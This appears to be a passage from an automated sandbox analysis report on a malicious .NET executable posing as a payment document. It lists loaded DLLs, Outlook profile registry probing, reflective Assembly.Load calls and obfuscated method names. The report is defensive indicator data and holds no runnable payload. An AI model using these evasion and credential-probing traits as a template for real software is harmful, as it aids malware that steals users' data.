                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.39e0b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.72d0000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1504E8 push esp; ret 0_2_0B1504E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040185B pushfd ; retf 2_2_0040187E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00426833 push edi; ret 2_2_0042683E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004148C0 push esp; retf 2_2_004148C1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004018BC pushad ; ret 2_2_004018D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004139BA pushfd ; ret 2_2_004139BB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041AA77 push edx; iretd 2_2_0041AA86
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00418304 push eax; ret 2_2_00418305
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417BD1 push esi; ret 2_2_00417BDA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040D3BF push edx; ret 2_2_0040D3DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00422562 push ss; retn 0000h2_2_0042256A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417E58 push ss; retf 2_2_00417E8D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041A6CB push edi; retf 2_2_0041A6DC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00401F0B pushfd ; retf 2_2_00401F0C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041771B push esi; ret 2_2_0041771D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041473C push edi; retf 2_2_0041473E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004117B1 push ss; iretd 2_2_004117C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014209AD push ecx; mov dword ptr [esp], ecx2_2_014209B6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047327FA pushad ; ret 7_2_047327F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473225F pushad ; ret 7_2_047327F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473283D push eax; iretd 7_2_04732858
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047609AD push ecx; mov dword ptr [esp], ecx7_2_047609B6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005710D9 push ss; retf 7_2_0057116B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E25E push edx; retf 7_2_0055E25D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E200 push edx; retf 7_2_0055E25D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00564568 push esi; ret 7_2_0056456A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E5FE push ss; iretd 7_2_0055E612
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00562607 pushfd ; ret 7_2_00562608
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00560807 pushfd ; ret 7_2_00560808
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00564A1E push esi; ret 7_2_00564A27
                Source: Payment&WarantyBonds.exeStatic PE information: section name: .text entropy: 7.95788200827039
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
